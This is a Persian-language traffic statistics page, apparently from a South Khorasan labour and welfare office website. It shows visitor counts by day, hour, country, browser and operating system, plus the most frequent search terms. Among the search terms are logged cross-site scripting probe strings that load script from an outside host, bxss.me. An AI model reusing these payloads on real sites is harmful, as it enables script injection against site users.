تعداد بازدیدکنندگان

۱۰ نفر
۳۴,۳۹۹,۴۵۴ نفر
۲۱,۳۶۱ نفر
۲۳,۹۸۶ نفر
۱۴ مهر ۱۳۹۴
۵۵,۳۱۵ نفر
تاریختعداد کاربرانتعداد صفحات مشاهده شده
۰۶/۲۹ ۲۸   کاربر ۳۲   صفحه
۰۶/۲۸ ۵۳   کاربر ۶۷   صفحه
۰۶/۲۷ ۸۳   کاربر ۲۰۶   صفحه
۰۶/۲۶ ۱۱۶   کاربر ۳۰,۹۱۱   صفحه
۰۶/۲۵ ۱۲۴   کاربر ۲۹۴   صفحه
۰۶/۲۴ ۹۴   کاربر ۱۱۱,۲۸۱   صفحه
۰۶/۲۳ ۲۹   کاربر ۱۱۴,۸۱۵   صفحه
۰۶/۲۲ ۱۱۵   کاربر ۱۲۷,۰۲۶   صفحه
۰۶/۲۱ ۱۱۷   کاربر ۱۵۰,۶۳۸   صفحه
۰۶/۲۰ ۱۰۵   کاربر ۱۳۴,۰۶۰   صفحه
۰۶/۱۹ ۱۰۸   کاربر ۱۶۳,۲۳۴   صفحه
۰۶/۱۸ ۱۱۳   کاربر ۸۶,۱۷۸   صفحه
۰۶/۱۷ ۱۴۰   کاربر ۱۵,۷۰۰   صفحه
۰۶/۱۶ ۲۶   کاربر ۵۱   صفحه
۰۶/۱۵ ۱۰۷   کاربر ۳۳,۳۴۲   صفحه
۰۶/۱۴ ۱۸۵   کاربر ۵۱,۲۶۹   صفحه
۰۶/۱۳ ۱۱۹   کاربر ۱۷,۸۴۷   صفحه
۰۶/۱۲ ۱۲۳   کاربر ۲۸۳   صفحه
۰۶/۱۱ ۱۰۳   کاربر ۲۳۲   صفحه
۰۶/۱۰ ۱۰۴   کاربر ۱۹۹   صفحه
۰۶/۰۹ ۲۶   کاربر ۳۴   صفحه
۰۶/۰۸ ۳۱   کاربر ۵۶   صفحه
۰۶/۰۷ ۸۴   کاربر ۱۹۳   صفحه
۰۶/۰۶ ۵۴   کاربر ۱۲۸   صفحه
۰۶/۰۵ ۷۹   کاربر ۱۷۸   صفحه
۰۶/۰۴ ۷۵   کاربر ۱۳۹   صفحه
۰۶/۰۳ ۶۷   کاربر ۱۴۰   صفحه
۰۶/۰۲ ۲۹   کاربر ۵۱   صفحه
۰۶/۰۱ ۳۷   کاربر ۹۸   صفحه
۰۵/۳۱ ۲۱   کاربر ۴۷   صفحه
ساعتتعداد بازدیددرصد بازدید

ساعت ۰ تا ۱
۹۴,۱۴۸ ۵ %

ساعت ۱ تا ۲
۱۰۷,۲۲۷ ۵ %

ساعت ۲ تا ۳
۱۰۴,۲۸۶ ۵ %

ساعت ۳ تا ۴
۹۲,۶۹۸ ۵ %

ساعت ۴ تا ۵
۸۴,۱۹۷ ۴ %

ساعت ۵ تا ۶
۷۴,۵۲۳ ۴ %

ساعت ۶ تا ۷
۶۸,۷۲۹ ۳ %

ساعت ۷ تا ۸
۷۵,۳۹۶ ۴ %

ساعت ۸ تا ۹
۸۸,۰۶۹ ۴ %

ساعت ۹ تا ۱۰
۸۳,۸۰۹ ۴ %

ساعت ۱۰ تا ۱۱
۸۶,۲۹۰ ۴ %

ساعت ۱۱ تا ۱۲
۸۰,۳۲۴ ۴ %

ساعت ۱۲ تا ۱۳
۹۲,۷۹۱ ۵ %

ساعت ۱۳ تا ۱۴
۱۰۰,۶۹۷ ۵ %

ساعت ۱۴ تا ۱۵
۱۰۹,۳۳۹ ۵ %

ساعت ۱۵ تا ۱۶
۹۵,۹۳۹ ۵ %

ساعت ۱۶ تا ۱۷
۹۴,۵۴۴ ۵ %

ساعت ۱۷ تا ۱۸
۸۳,۴۲۰ ۴ %

ساعت ۱۸ تا ۱۹
۷۷,۴۹۷ ۴ %

ساعت ۱۹ تا ۲۰
۶۵,۸۰۲ ۳ %

ساعت ۲۰ تا ۲۱
۵۶,۸۵۸ ۳ %

ساعت ۲۱ تا ۲۲
۶۳,۴۳۲ ۳ %

ساعت ۲۲ تا ۲۳
۶۷,۱۰۵ ۳ %

ساعت ۲۳ تا ۲۴
۶۴,۱۷۵ ۳ %
نام کشورتعداد بازدیددرصد بازدید
IRN
IRN
۱۹,۸۴۶,۸۷۰ ۵۸ %
ZZZ
ZZZ
۶,۸۲۰,۰۵۵ ۲۰ %
USA
USA
۱,۶۷۲,۰۴۳ ۵ %

۱,۶۳۲,۷۵۹ ۵ %
EU
EU
۱,۵۲۷,۷۷۲ ۴ %
DEU
DEU
۷۵۵,۸۸۲ ۲ %
GBR
GBR
۳۷۶,۴۸۸ ۱ %
RUS
RUS
۳۴۷,۹۲۹ ۱ %
ROM
ROM
۳۰۵,۶۶۶ ۱ %
FRA
FRA
۱۷۱,۴۱۶ ۱ %
CHN
CHN
۹۳,۳۵۷ ۰ %
ITA
ITA
۷۴,۳۷۷ ۰ %
NOR
NOR
۶۲,۰۰۳ ۰ %
TUR
TUR
۵۸,۲۰۲ ۰ %
POL
POL
۴۹,۳۵۳ ۰ %
FIN
FIN
۴۲,۴۴۱ ۰ %
CAN
CAN
۳۹,۲۴۸ ۰ %
DNK
DNK
۳۸,۸۷۷ ۰ %
UKR
UKR
۳۷,۳۹۲ ۰ %
AUS
AUS
۳۲,۶۷۰ ۰ %
نام مرورگرتعداد بازدیددرصد بازدید
Firefox
Firefox
۴۲,۶۱۱ ۴۲ %
Chrome
Chrome
۳۱,۰۸۶ ۳۰ %
Mozilla
Mozilla
۷,۲۴۳ ۷ %
IE 9.0
IE 9.0
۴,۳۸۵ ۴ %
IE 8.0
IE 8.0
۳,۸۹۰ ۴ %
Other
Other
۳,۶۴۰ ۴ %
IE 6.0
IE 6.0
۲,۶۳۳ ۳ %
IE 11.0
IE 11.0
۲,۳۸۲ ۲ %
IE 7.0
IE 7.0
۱,۵۷۴ ۲ %
Safari
Safari
۱,۲۰۴ ۱ %
Opera
Opera
۶۶۱ ۱ %
IE 10.0
IE 10.0
۵۷۶ ۱ %
Edge
Edge
۱۴۶ ۰ %
سیستم عاملتعداد بازدیددرصد بازدید
XP ۳۳,۵۹۲ ۳۴ %
Windows 7 ۳۱,۹۲۵ ۳۲ %
Other ۱۱,۷۸۲ ۱۲ %
Linux ۹,۰۸۸ ۹ %
Windows 2003 ۶,۰۵۲ ۶ %
Windows 10 ۳,۰۶۶ ۳ %
Windows 8 ۲,۰۴۱ ۲ %
iOS ۹۶۳ ۱ %
Vista ۷۷۳ ۱ %
Android ۷۴۸ ۱ %
FreeBSD ۳ ۰ %
WebOS ۰ ۰ %
Windows Mobile ۰ ۰ %
کلمات جستجو شده 
testing ۳۰,۵۷۷
اداره کار بیرجند ۳۶۱
اداره کل تعاون کار و رفاه اجتماعی خراسان جنوبی ۲۸۱
اداره کل تعاون خراسان جنوبی ۲۶۹
اداره کل تعاون،کارورفاه اجتماعی استان خراسان جنوبی ۱۹۳
اداره کار خراسان جنوبی ۱۶۴
اداره کل تعاون کار خراسان جنوبی ۱۵۳
اداره کل تعاون کار ورفاه اجتماعی خراسان جنوبی ۱۵۰
older news google.com/url?sa=?q=how to ۱۳۷
اداره کل تعاون کارورفاه اجتماعی خراسان جنوبی ۱۱۶
اداره تعاون خراسان جنوبی ۱۰۵
اداره کل کار خراسان جنوبی ۱۰۲
اداره کل تعاون جنوبی ۱۰۰
اداره کل تعاون،کارورفاه اجتماعی خراسان جنوبی ۸۴
testing''"() ۷۸
testing<svg/onload='' /"/ /onmouseover=1/ (s=document.createElement(/script/.source),s.src=(/,/ /bxss.me\/s?u=048877 ۷۳
testing''>"><script src=http://bxss.me/s?u=048877 ۷۳
نمونه قرارداد ۷۳
اداره تعاون بیرجند ۶۳
بیمه بیکاری ۵۹
اداره کل تعاون بیرجند ۴۹
ایمنی ۴۵
آموزش گلخانه داری ۴۵
اداره کل تعاون کار و رفاه خراسان جنوبی ۴۵
تعاون خراسان جنوبی ۴۳
سنوات ۴۲
www.skh.mcls.gov.ir ۳۸
ادارهکل تعاون کار خراسان جنوبی ۳۷
مشاغل خانگی ۳۷
حق سنوات ۳۷
اداره کل تعاون کار ورفاه خراسان جنوبی ۳۳
اداره کاربیرجند ۳۲
صندوق بیمه روستائیان وعشایر ۳۲
yaraneh10.ir ۳۲
سایت اداره کل تعاون کار خراسان جنوبی ۳۱
اداره کار استان خراسان جنوبی ۲۹
اعتراض به حذف یارانه ۲۹
عکس بازدیدمعاون وزیر کار ۲۷
فرم ۲۷
اساسنامه ۲۷
اولویت های پژوهشی ۲۷
قاین ۲۷
www.skh.mcls.gov.ir/fa/home ۲۶
کار ۲۵
ادارات خراسان جنوبی ۲۴
اداره کل کار و امور اجتماعی خراسان جنوبی ۲۴
تعاونی های آموزشگاهی ۲۳
www.kn93.mcls.gov.ir ۲۳
اداره کل تعاون استان خراسان جنوبی ۲۲
ماده ۴۶ در رابطه با ماموریت در روز جمعه ۲۲